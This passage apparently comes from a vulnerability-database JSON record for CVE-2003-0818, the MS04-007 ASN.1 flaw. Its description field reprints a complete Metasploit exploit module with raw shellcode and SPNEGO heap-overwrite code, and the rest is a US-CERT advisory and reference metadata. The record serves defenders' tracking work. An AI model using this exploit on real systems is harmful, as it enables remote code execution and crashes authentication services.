ASN.1 library. Both vulnerabilities were fixed in the\n\t\t\t\tMS04-007 patch. \n\n\t\t\t\tYou are only allowed one attempt with this vulnerability. If\n\t\t\t\tthe payload fails to execute, the LSASS system service will\n\t\t\t\tcrash and the target system will automatically reboot itself\n\t\t\t\tin 60 seconds. If the payload succeeeds, the system will no\n\t\t\t\tlonger be able to process authentication requests, denying\n\t\t\t\tall attempts to login through SMB or at the console. A\n\t\t\t\treboot is required to restore proper functioning of an\n\t\t\t\texploited system. \n\t\t\t\t\n\t\t\t\tThis exploit has been successfully tested with the win32/*/reverse_tcp\n\t\t\t\tpayloads, however a few problems were encounted when using the\n\t\t\t\tequivalent bind payloads. Your mileage may vary. \n\t\t\t\t\t\n\t\t\t},\n\t\t\t\u0027Author\u0027 =\u003e [ \u0027Solar Eclipse \u003csolareclipse@phreedom.org\u003e\u0027 ],\n\t\t\t\u0027License\u0027 =\u003e GPL_LICENSE,\n\t\t\t\u0027Version\u0027 =\u003e \u0027$Revision$\u0027,\n\t\t\t\u0027References\u0027 =\u003e\n\t\t\t\t[\n\t\t\t\t\t[ \u0027CVE\u0027, \u00272003-0818\u0027],\n\t\t\t\t\t[ \u0027OSVDB\u0027, \u00273902\u0027 ],\n\t\t\t\t\t[ \u0027BID\u0027, \u00279633\u0027],\n\t\t\t\t\t[ \u0027URL\u0027, \u0027http://www.phreedom.org/solar/exploits/msasn1-bitstring/\u0027],\n\t\t\t\t\t[ \u0027MSB\u0027, \u0027MS04-007\u0027],\n\n\t\t\t\t],\n\t\t\t\u0027DefaultOptions\u0027 =\u003e\n\t\t\t\t{\n\t\t\t\t\t\u0027EXITFUNC\u0027 =\u003e \u0027thread\u0027\n\t\t\t\t},\t\t\t\t\n\t\t\t\u0027Privileged\u0027 =\u003e true,\n\t\t\t\u0027Payload\u0027 =\u003e\n\t\t\t\t{\n\t\t\t\t\t\u0027Space\u0027 =\u003e 1024,\n\t\t\t\t\t\u0027StackAdjustment\u0027 =\u003e -3500,\n\t\t\t\t},\n\t\t\t\u0027Platform\u0027 =\u003e \u0027win\u0027,\n\t\t\t\u0027Targets\u0027 =\u003e \n\t\t\t\t[\n\t\t\t\t\t[ \n\t\t\t\t\t\t\u0027Windows 2000 SP2-SP4 + Windows XP SP0-SP1\u0027, # Tested OK - 11/25/2005 hdm (bind failed)\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\u0027Platform\u0027 =\u003e \u0027win\u0027,\n\t\t\t\t\t\t},\n\t\t\t\t\t],\n\t\t\t\t],\n\t\t\t\u0027DisclosureDate\u0027 =\u003e \u0027Feb 10 2004\u0027,\n\t\t\t\u0027DefaultTarget\u0027 =\u003e 0))\n\t\t\t\n\t\tregister_options(\n\t\t\t[\n\t\t\t\tOptString.new(\u0027PROTO\u0027, [ true, \"Which protocol to use: http or smb\", \u0027smb\u0027]),\n\t\t\t], self.class)\t\t\t\n\tend\n\n\t# This exploit is too destructive to use during automated exploitation. \n\t# Better Windows-based exploits exist at this time (Sep 2006)\n\tdef autofilter\n\t\tfalse\n\tend\n\n\t# This is a straight port of Solar Eclipse\u0027s \"kill-bill\" exploit, published\n\t# as a Metasploit Framework module with his permission. This module is only\n\t# licensed under GPLv2, keep this in mind if you embed the Framework into\n\t# a non-GPL application. -hdm[at]metasploit.com\n\n\tdef exploit\n\t\n\t\t# The first stage shellcode fixes the PEB pointer and cleans the heap\n\t\tstage0 = \n\t\t\t\"\\x53\\x56\\x57\\x66\\x81\\xec\\x80\\x00\\x89\\xe6\\xe8\\xed\\x00\\x00\\x00\\xff\"+\n\t\t\t\"\\x36\\x68\\x09\\x12\\xd6\\x63\\xe8\\xf7\\x00\\x00\\x00\\x89\\x46\\x08\\xe8\\xa2\"+\n\t\t\t\"\\x00\\x00\\x00\\xff\\x76\\x04\\x68\\x6b\\xd0\\x2b\\xca\\xe8\\xe2\\x00\\x00\\x00\"+\n\t\t\t\"\\x89\\x46\\x0c\\xe8\\x3f\\x00\\x00\\x00\\xff\\x76\\x04\\x68\\xfa\\x97\\x02\\x4c\"+\n\t\t\t\"\\xe8\\xcd\\x00\\x00\\x00\\x31\\xdb\\x68\\x10\\x04\\x00\\x00\\x53\\xff\\xd0\\x89\"+\n\t\t\t\"\\xc3\\x56\\x8b\\x76\\x10\\x89\\xc7\\xb9\\x10\\x04\\x00\\x00\\xf3\\xa4\\x5e\\x31\"+\n\t\t\t\"\\xc0\\x50\\x50\\x50\\x53\\x50\\x50\\xff\\x56\\x0c\\x8b\\x46\\x08\\x66\\x81\\xc4\"+\n\t\t\t\"\\x80\\x00\\x5f\\x5e\\x5b\\xff\\xe0\\x60\\xe8\\x23\\x00\\x00\\x00\\x8b\\x44\\x24\"+\n\t\t\t\"\\x0c\\x8d\\x58\\x7c\\x83\\x43\\x3c\\x05\\x81\\x43\\x28\\x00\\x10\\x00\\x00\\x81\"+\n\t\t\t\"\\x63\\x28\\x00\\xf0\\xff\\xff\\x8b\\x04\\x24\\x83\\xc4\\x14\\x50\\x31\\xc0\\xc3\"+\n\t\t\t\"\\x31\\xd2\\x64\\xff\\x32\\x64\\x89\\x22\\x31\\xdb\\xb8\\x90\\x42\\x90\\x42\\x31\"+\n\t\t\t\"\\xc9\\xb1\\x02\\x89\\xdf\\xf3\\xaf\\x74\\x03\\x43\\xeb\\xf3\\x89\\x7e\\x10\\x64\"+\n\t\t\t\"\\x8f\\x02\\x58\\x61\\xc3\\x60\\xbf\\x20\\xf0\\xfd\\x7f\\x8b\\x1f\\x8b\\x46\\x08\"+\n\t\t\t\"\\x89\\x07\\x8b\\x7f\\xf8\\x81\\xc7\\x78\\x01\\x00\\x00\\x89\\xf9\\x39\\x19\\x74\"+\n\t\t\t\"\\x04\\x8b\\x09\\xeb\\xf8\\x89\\xfa\\x39\\x5a\\x04\\x74\\x05\\x8b\\x52\\x04\\xeb\"+\n\t\t\t\"\\xf6\\x89\\x11\\x89\\x4a\\x04\\xc6\\x43\\xfd\\x01\\x61\\xc3\\xa1\\x0c\\xf0\\xfd\"+\n\t\t\t\"\\x7f\\x8b\\x40\\x1c\\x8b\\x58\\x08\\x89\\x1e\\x8b\\x00\\x8b\\x40\\x08\\x89\\x46\"+\n\t\t\t\"\\x04\\xc3\\x60\\x8b\\x6c\\x24\\x28\\x8b\\x45\\x3c\\x8b\\x54\\x05\\x78\\x01\\xea\"+\n\t\t\t\"\\x8b\\x4a\\x18\\x8b\\x5a\\x20\\x01\\xeb\\xe3\\x38\\x49\\x8b\\x34\\x8b\\x01\\xee\"+\n\t\t\t\"\\x31\\xff\\x31\\xc0\\xfc\\xac\\x38\\xe0\\x74\\x07\\xc1\\xcf\\x0d\\x01\\xc7\\xeb\"+\n\t\t\t\"\\xf4\\x3b\\x7c\\x24\\x24\\x75\\xe1\\x8b\\x5a\\x24\\x01\\xeb\\x66\\x8b\\x0c\\x4b\"+\n\t\t\t\"\\x8b\\x5a\\x1c\\x01\\xeb\\x8b\\x04\\x8b\\x01\\xe8\\x89\\x44\\x24\\x1c\\x61\\xc2\"+\n\t\t\t\"\\x08\\x00\\xeb\\xfe\"\n\n\t\ttoken = spnego_token(stage0, payload.encoded)\n\t\t\n\t\tcase datastore[\u0027PROTO\u0027]\n\t\t\twhen \u0027smb\u0027\n\t\t\t\texploit_smb(token)\n\t\t\twhen \u0027http\u0027\n\t\t\t\texploit_http(token)\n\t\t\telse\n\t\t\t\tprint_status(\"Invalid application protocol specified, use smb or http\")\n\t\tend\n\tend\n\t\n\t\n\tdef exploit_smb(token)\n\t\tconnect\n\t\t\n\t\tclient = Rex::Proto::SMB::Client.new(sock)\n\n\t\tbegin\n\t\t\tclient.session_request(smb_hostname()) if not datastore[\u0027SMBDirect\u0027]\n\t\t\tclient.negotiate\n\t\t\tclient.session_setup_ntlmv2_blob(token)\n\t\trescue =\u003e e\n\t\t\tif (e.to_s =~ /error code 0x00050001/)\n\t\t\t\tprint_status(\"The target system has already been exploited\")\n\t\t\telse\n\t\t\t\tprint_status(\"Error: #{e}\")\n\t\t\tend\n\t\tend\n\t\t\n\t\thandler\n\t\tdisconnect\n\tend\n\t\n\tdef exploit_http(token)\n\t\tconnect\n\t\t\n\t\treq = \"GET / HTTP/1.0\\r\\n\"\n\t\treq \u003c\u003c \"Host: #{ datastore[\u0027RHOST\u0027]}\\r\\n\"\n\t\treq \u003c\u003c \"Authorization: Negotiate #{Rex::Text.encode_base64(token, \u0027\u0027)}\\r\\n\\r\\n\"\n\n\t\tsock.put(req)\n\t\tres = sock.get_once\n\t\t\n\t\tif (res and res =~ /0x80090301/)\n\t\t\tprint_status(\"This server does not support the Negotiate protocol or has already been exploited\")\n\t\tend\n\t\t\n\t\tif (res and res =~ /0x80090304/)\n\t\t\tprint_status(\"This server responded with error code 0x80090304 (wth?)\")\n\t\tend\t\t\n\t\t\n\t\thandler\n\t\tdisconnect\n\tend\n\t\n\n\t# Returns an ASN.1 encoded string\n\tdef enc_asn1(str)\n\t\tRex::Proto::SMB::Utils::asn1encode(str)\n\tend\n\n\t# Returns an ASN.1 encoded bit string with 0 unused bits\n\tdef enc_bits(str)\n\t\t\"\\x03\" + enc_asn1(\"\\x00\" + str)\n\tend\n\n\t# Returns a BER encoded constructed bit string\n\tdef enc_constr(*str_arr)\n\t\t\"\\x23\" + enc_asn1(str_arr.join(\u0027\u0027))\n\tend\n\n\t# Returns a BER encoded SPNEGO token\n\tdef spnego_token(stage0, stage1)\n\t\t\n\t\tif !(stage0 and stage1)\n\t\t\tprint_status(\"Invalid parameters passed to spnego_token\")\n\t\t\treturn\n\t\tend\n\t\t\n\t\tif (stage0.length \u003e 1032)\n\t\t\tprint_status(\"The stage 0 shellcode is longer than 1032 bytes\")\n\t\t\treturn\n\t\tend\n\t\t\n\t\ttag = \"\\x90\\x42\\x90\\x42\\x90\\x42\\x90\\x42\"\n\t\t\n\t\tif ((tag.length + stage1.length) \u003e 1033)\n\t\t\tprint_status(\"The stage 1 shellcode is too long\")\n\t\t\treturn\n\t\tend\n\t\t\n\t\t\n\t\t# The first two overwrites must succeed, so we write to an unused location\n\t\t# in the PEB block. We don\u0027t care about the values, because after this the\n\t\t# doubly linked list of free blocks is corrupted and we get to the second\n\t\t# overwrite which is more useful. \n\n\t\tfw = \"\\xf8\\x0f\\x01\\x00\"\t\t# 0x00010ff8\n\t\tbk = \"\\xf8\\x0f\\x01\"\n\t\t\t\t\n\t\t# The second overwrite writes the address of our shellcode into the\n\t\t# FastPebLockRoutine pointer in the PEB\n\n\t\tpeblock = \"\\x20\\xf0\\xfd\\x7f\" # FastPebLockRoutine in PEB\n\t\t\t\n\t\tbitstring = enc_constr( \n\t\t\tenc_bits(\"A\" * 1024),\n\t\t\t\"\\x03\\x00\",\n\t\t\tenc_constr(\n\t\t\t\tenc_bits(tag + stage1 + (\"B\" * (1033-(tag+stage1).length))),\n\t\t\t\tenc_constr( enc_bits(fw + bk) ),\n\t\t\t\tenc_constr(\n\t\t\t\t\tenc_bits(\"CCCC\" + peblock + stage0 + (\"C\" * (1032-stage0.length))),\n\t\t\t\t\tenc_constr(\n\t\t\t\t\t\tenc_bits(\"\\xeb\\x06\" + make_nops(6)),\n\t\t\t\t\t\tenc_bits(\"D\" * 1040)\n\t\t\t\t\t)\n\t\t\t\t)\n\t\t\t)\n\t\t)\n\t\t\n\t\ttoken = \"\\x60\" + enc_asn1( # Application Constructed Object\n\t\t\t\"\\x06\\x06\\x2b\\x06\\x01\\x05\\x05\\x02\" + # SPNEGO OID\n\t\t\t\"\\xa0\" + enc_asn1(\t\t\t\t\t # NegTokenInit (0xa0)\n\t\t\t\t\"\\x30\" + enc_asn1(\n\t\t\t\t\t\"\\xa1\" + enc_asn1(\n\t\t\t\t\t\tbitstring\n\t\t\t\t\t)\n\t\t\t\t)\n\t\t\t)\n\t\t)\n\t\t\n\t\treturn token\t\n\tend\n\nend\n. \n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nMultiple Vulnerabilities in Microsoft ASN.1 Library\n\n Original issue date: February 10, 2004\n Last revised: --\n Source: US-CERT\n\n A complete revision history is at the end of this document. According to information from eEye Digital Security,\n the vulnerabilities involve integer overflows and other flaws in\n integer arithmetic. \n\n Any application that loads the ASN.1 library could serve as an attack\n vector. In particular, ASN.1 is used by a number of cryptographic and\n authentication services such as digital certificates (x.509),\n Kerberos, NTLMv2, SSL,and TLS. Both client and server systems are\n affected. The Local Security Authority Subsystem (lsass.exe) and a\n component of the CryptoAPI (crypt32.dll) use the vulnerable ASN.1\n library. \n\nSolution\n\nApply a patch\n\n Apply the appropriate patch as specified by Microsoft Security\n Bulletin MS04-007. \n\nVendor Information\n\n This appendix contains information provided by vendors. When vendors\n report new information, this section is updated and the changes are\n noted in the revision history. If a vendor is not listed below, we\n have not received their comments. \n\nMicrosoft\n\n Please see Microsoft Security Bulletin MS04-007. \n\nReferences\n\n * Vulnerability Note VU#216324 -\n \u003chttp://www.kb.cert.org/vuls/id/216324\u003e\n * Vulnerability Note VU#583108 -\n \u003chttp://www.kb.cert.org/vuls/id/583108\u003e\n * eEye Digital Security Advisory AD20040210 -\n \u003chttp://www.eeye.com/html/Research/Advisories/AD20040210.html\u003e\n * eEye Digital Security Advisory AD20040210-2 -\n \u003chttp://www.eeye.com/html/Research/Advisories/AD20040210-2.html\u003e\n * Microsoft Security Bulletin MS04-007 -\n \u003chttp://microsoft.com/technet/security/bulletin/MS04-007.asp\u003e\n * Microsoft Knowledge Base Article 252648 -\n \u003chttp://support.microsoft.com/default.aspx?scid=252648\u003e\n _________________________________________________________________\n\n These vulnerabilities were researched and reported by eEye Digital\n Security. Information from eEye and Microsoft was used in this\n document. \n _________________________________________________________________\n\n Feedback can be directed to the author, Art Manion. \n\n Copyright 2004 Carnegie Mellon University. \n\n Revision History\n\n February 10, 2004: Initial release\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.2.1 (GNU/Linux)\n\niD8DBQFAKVrdXlvNRxAkFWARAuOvAJwL2gJJPBRdrtZ0Le4yyLQLu7CHewCgvaCW\n5hU8LQ/oOC4sI8PpnkppCyg=\n=Oe/N\n-----END PGP SIGNATURE-----\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2003-0818"
},
{
"db": "CERT/CC",
"id": "VU#583108"
},
{
"db": "CERT/CC",
"id": "VU#216324"
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000037"
},
{
"db": "BID",
"id": "13300"
},
{
"db": "BID",
"id": "9633"
},
{
"db": "BID",
"id": "9635"
},
{
"db": "VULMON",
"id": "CVE-2003-0818"
},
{
"db": "PACKETSTORM",
"id": "83044"
},
{
"db": "PACKETSTORM",
"id": "32667"
}
],
"trust": 4.14
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=153",
"trust": 0.3,
"type": "exploit"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2003-0818"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#583108",
"trust": 4.0
},
{
"db": "NVD",
"id": "CVE-2003-0818",
"trust": 3.5
},
{
"db": "CERT/CC",
"id": "VU#216324",
"trust": 2.9
},
{
"db": "USCERT",
"id": "TA04-041A",
"trust": 2.6
},
{
"db": "BID",
"id": "13300",
"trust": 1.2
},
{
"db": "BID",
"id": "9635",
"trust": 1.1
},
{
"db": "XF",
"id": "15039",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000037",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200403-040",
"trust": 0.6
},
{
"db": "BID",
"id": "9633",
"trust": 0.3
},
{
"db": "EXPLOIT-DB",
"id": "153",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2003-0818",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "83044",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "32667",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#583108"
},
{
"db": "CERT/CC",
"id": "VU#216324"
},
{
"db": "VULMON",
"id": "CVE-2003-0818"
},
{
"db": "BID",
"id": "13300"
},
{
"db": "BID",
"id": "9633"
},
{
"db": "BID",
"id": "9635"
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000037"
},
{
"db": "PACKETSTORM",
"id": "83044"
},
{
"db": "PACKETSTORM",
"id": "32667"
},
{
"db": "CNNVD",
"id": "CNNVD-200403-040"
},
{
"db": "NVD",
"id": "CVE-2003-0818"
}
]
},
"id": "VAR-200403-0051",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 1.0
},
"last_update_date": "2024-08-14T12:57:20.421000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "MS04-007",
"trust": 0.8,
"url": "http://www.microsoft.com/technet/security/bulletin/MS04-007.mspx"
},
{
"title": "MS04-007",
"trust": 0.8,
"url": "http://www.microsoft.com/japan/technet/security/bulletin/MS04-007.mspx"
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/nitishbadole/oscp-note-2 "
},
{
"title": "OSCP",
"trust": 0.1,
"url": "https://github.com/H3n2yk/OSCP "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/rmsbpro/rmsbpro "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2003-0818"
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000037"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2003-0818"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.2,
"url": "http://www.kb.cert.org/vuls/id/583108"
},
{
"trust": 2.5,
"url": "http://www.us-cert.gov/cas/techalerts/ta04-041a.html"
},
{
"trust": 2.0,
"url": "http://www.kb.cert.org/vuls/id/216324"
},
{
"trust": 1.7,
"url": "http://marc.info/?l=ntbugtraq\u0026m=107650972617367\u0026w=2"
},
{
"trust": 1.7,
"url": "http://marc.info/?l=bugtraq\u0026m=107643892224825\u0026w=2"
},
{
"trust": 1.7,
"url": "http://marc.info/?l=bugtraq\u0026m=107643836125615\u0026w=2"
},
{
"trust": 1.7,
"url": "http://marc.info/?l=ntbugtraq\u0026m=107650972723080\u0026w=2"
},
{
"trust": 1.7,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a799"
},
{
"trust": 1.7,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a797"
},
{
"trust": 1.7,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a796"
},
{
"trust": 1.7,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a653"
},
{
"trust": 1.7,
"url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2004/ms04-007"
},
{
"trust": 1.6,
"url": "http://www.microsoft.com/technet/security/bulletin/ms04-007.asp"
},
{
"trust": 1.6,
"url": "http://support.microsoft.com/default.aspx?scid=252648"
},
{
"trust": 1.6,
"url": "http://www.itu.int/itu-t/asn1/"
},
{
"trust": 1.6,
"url": "http://www.asn1.org/"
},
{
"trust": 1.4,
"url": "http://www.eeye.com/html/research/advisories/ad20040210-2.html"
},
{
"trust": 0.9,
"url": "http://www.securityfocus.com/bid/13300"
},
{
"trust": 0.9,
"url": "http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms04-007.asp"
},
{
"trust": 0.9,
"url": "/archive/1/354227"
},
{
"trust": 0.8,
"url": "http://www.eeye.com/html/research/advisories/ad20040210.html"
},
{
"trust": 0.8,
"url": "http://www.ciac.org/ciac/bulletins/o-065.shtml"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2003-0818"
},
{
"trust": 0.8,
"url": "http://www.ipa.go.jp/security/ciadr/vul/20040212-asn1.html"
},
{
"trust": 0.8,
"url": "http://xforce.iss.net/xforce/xfdb/15039"
},
{
"trust": 0.8,
"url": "http://www.jpcert.or.jp/wr/2004/wr040701.txt"
},
{
"trust": 0.8,
"url": "http://www.jpcert.or.jp/at/2004/at040001.txt"
},
{
"trust": 0.8,
"url": "http://jvn.jp/cert/jvnta04-041a/"
},
{
"trust": 0.8,
"url": "http://jvn.jp/tr/trta04-041a/"
},
{
"trust": 0.8,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2003-0818"
},
{
"trust": 0.8,
"url": "http://www.securityfocus.com/bid/9635"
},
{
"trust": 0.8,
"url": "http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?vname=worm%5frbot%2ebjf"
},
{
"trust": 0.8,
"url": "http://www.isskk.co.jp/support/techinfo/general/ms_asn1_164.html"
},
{
"trust": 0.8,
"url": "http://www.cyberpolice.go.jp/important/20040211_084159.html"
},
{
"trust": 0.3,
"url": "http://www.phreedom.org/solar/exploits/msasn1-bitstring/"
},
{
"trust": 0.3,
"url": "http://support.coresecurity.com/impact/exploits/b2dfb901799eec9f96bf4cb85af2723d.html"
},
{
"trust": 0.3,
"url": "/archive/1/353320"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://www.exploit-db.com/exploits/153/"
},
{
"trust": 0.1,
"url": "https://www.rapid7.com/db/modules/exploit/windows/smb/ms04_007_killbill"
},
{
"trust": 0.1,
"url": "http://metasploit.com/framework/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2003-0818"
},
{
"trust": 0.1,
"url": "http://www.phreedom.org/solar/exploits/msasn1-bitstring/\u0027],"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/583108\u003e"
},
{
"trust": 0.1,
"url": "http://microsoft.com/technet/security/bulletin/ms04-007.asp\u003e"
},
{
"trust": 0.1,
"url": "http://support.microsoft.com/default.aspx?scid=252648\u003e"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/216324\u003e"
},
{
"trust": 0.1,
"url": "http://www.eeye.com/html/research/advisories/ad20040210.html\u003e"
},
{
"trust": 0.1,
"url": "http://www.us-cert.gov/cas/techalerts/ta04-041a.html\u003e"
},
{
"trust": 0.1,
"url": "http://www.eeye.com/html/research/advisories/ad20040210-2.html\u003e"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#583108"
},
{
"db": "CERT/CC",
"id": "VU#216324"
},
{
"db": "VULMON",
"id": "CVE-2003-0818"
},
{
"db": "BID",
"id": "13300"
},
{
"db": "BID",
"id": "9633"
},
{
"db": "BID",
"id": "9635"
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000037"
},
{
"db": "PACKETSTORM",
"id": "83044"
},
{
"db": "PACKETSTORM",
"id": "32667"
},
{
"db": "CNNVD",
"id": "CNNVD-200403-040"
},
{
"db": "NVD",
"id": "CVE-2003-0818"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#583108"
},
{
"db": "CERT/CC",
"id": "VU#216324"
},
{
"db": "VULMON",
"id": "CVE-2003-0818"
},
{
"db": "BID",
"id": "13300"
},
{
"db": "BID",
"id": "9633"
},
{
"db": "BID",
"id": "9635"
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000037"
},
{
"db": "PACKETSTORM",
"id": "83044"
},
{
"db": "PACKETSTORM",
"id": "32667"
},
{
"db": "CNNVD",
"id": "CNNVD-200403-040"
},
{
"db": "NVD",
"id": "CVE-2003-0818"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2004-02-10T00:00:00",
"db": "CERT/CC",
"id": "VU#583108"
},
{
"date": "2004-02-10T00:00:00",
"db": "CERT/CC",
"id": "VU#216324"
},
{
"date": "2004-03-03T00:00:00",
"db": "VULMON",
"id": "CVE-2003-0818"
},
{
"date": "2005-04-21T00:00:00",
"db": "BID",
"id": "13300"
},
{
"date": "2004-02-10T00:00:00",
"db": "BID",
"id": "9633"
},
{
"date": "2004-02-10T00:00:00",
"db": "BID",
"id": "9635"
},
{
"date": "2007-04-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2004-000037"
},
{
"date": "2009-11-26T00:34:53",
"db": "PACKETSTORM",
"id": "83044"
},
{
"date": "2004-02-11T02:24:00",
"db": "PACKETSTORM",
"id": "32667"
},
{
"date": "2003-11-11T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200403-040"
},
{
"date": "2004-03-03T05:00:00",
"db": "NVD",
"id": "CVE-2003-0818"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2004-02-10T00:00:00",
"db": "CERT/CC",
"id": "VU#583108"
},
{
"date": "2004-02-11T00:00:00",
"db": "CERT/CC",
"id": "VU#216324"
},
{
"date": "2019-04-30T00:00:00",
"db": "VULMON",
"id": "CVE-2003-0818"
},
{
"date": "2009-07-12T14:06:00",
"db": "BID",
"id": "13300"
},
{
"date": "2009-07-12T02:06:00",
"db": "BID",
"id": "9633"
},
{
"date": "2009-07-12T02:06:00",
"db": "BID",
"id": "9635"
},
{
"date": "2007-04-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2004-000037"
},
{
"date": "2019-05-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200403-040"
},
{
"date": "2019-04-30T14:27:13.710000",
"db": "NVD",
"id": "CVE-2003-0818"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "13300"
},
{
"db": "BID",
"id": "9633"
},
{
"db": "BID",
"id": "9635"
}
],
"trust": 0.9
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Microsoft ASN.1 Library improperly decodes constructed bit strings",
"sources": [
{
"db": "CERT/CC",
"id": "VU#583108"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Boundary Condition Error",
"sources": [
{
"db": "BID",
"id": "13300"
},
{
"db": "BID",
"id": "9633"
},
{
"db": "BID",
"id": "9635"
}
],
"trust": 0.9
}
}